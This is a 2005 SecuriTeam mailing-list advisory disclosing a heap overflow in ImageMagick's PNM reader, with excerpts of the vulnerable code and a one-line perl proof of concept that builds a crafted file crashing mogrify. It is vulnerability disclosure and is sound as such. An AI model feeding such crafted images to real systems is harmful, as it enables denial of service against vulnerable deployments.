[UNIX] ImageMagick ReadPNMImage() Heap Overflow

• Previous message: SecuriTeam: "[UNIX] MySQL MaxDB Webtool Remote 'If' Stack Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 27 Apr 2005 17:52:35 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  ImageMagick ReadPNMImage() Heap Overflow
------------------------------------------------------------------------

SUMMARY

 <http://www.imagemagick.org> ImageMagick is "a free software suite to
create, edit, and compose bitmap images. It can read, convert and write
images in a large variety of formats".

Remote exploitation of a heap overflow vulnerability in ImageMagick's
ReadPNMImage function allows execution of arbitrary code or cause denial
of service.

DETAILS

Vulnerable Systems:
 * ImageMagick versions 6.x up to and including 6.2.1.

Immune Systems:
 * ImageMagick version 6.2.2.

Heap Overflow Vulnerability:
A heap overflow exists in ReadPNMImage() function, that is used to decode
a PNM image files.
The vulnerable code in pnm.c:
static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo
*exception)
{
..
    if ((format == '1') || (format == '4'))
      max_value=1; /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
MaxColormapSize : max_value+1);
      }
..
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  
image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  
image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }

Its possible to manipulate with image->colors value, because it's
attributed to "max_value" or MaxColormapSize variable. Allocation of
memory for image->colormap is based on image->colors variable
(AllocateImageColormap() function).
If value of "image->colors" is for example 1, only 1*sizeof(PixelPacket)
bytes of memory were allocated. Next, when format of PNM file is "7",
image->colormap buffer is initialized by 332 colormaps. If
image->colors*sizeof(PixelPacket) bytes are not enough for it, heap
structures are overflowed. We cannot control contents of this buffer, so
execution of arbitrary code is very difficult or impossible, but to crash
it is easy.

Proof of Concept:
Example of crafted PNM file:
bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

Test vulnerability with "mogrify" - standard ImageMagick utility:
bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$

ADDITIONAL INFORMATION

The information has been provided by <mailto:pucik@overflow.pl> Damian
Put.
The original article can be found at:
<http://www.overflow.pl/adv/imheapoverflow.txt>
http://www.overflow.pl/adv/imheapoverflow.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] MySQL MaxDB Webtool Remote 'If' Stack Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]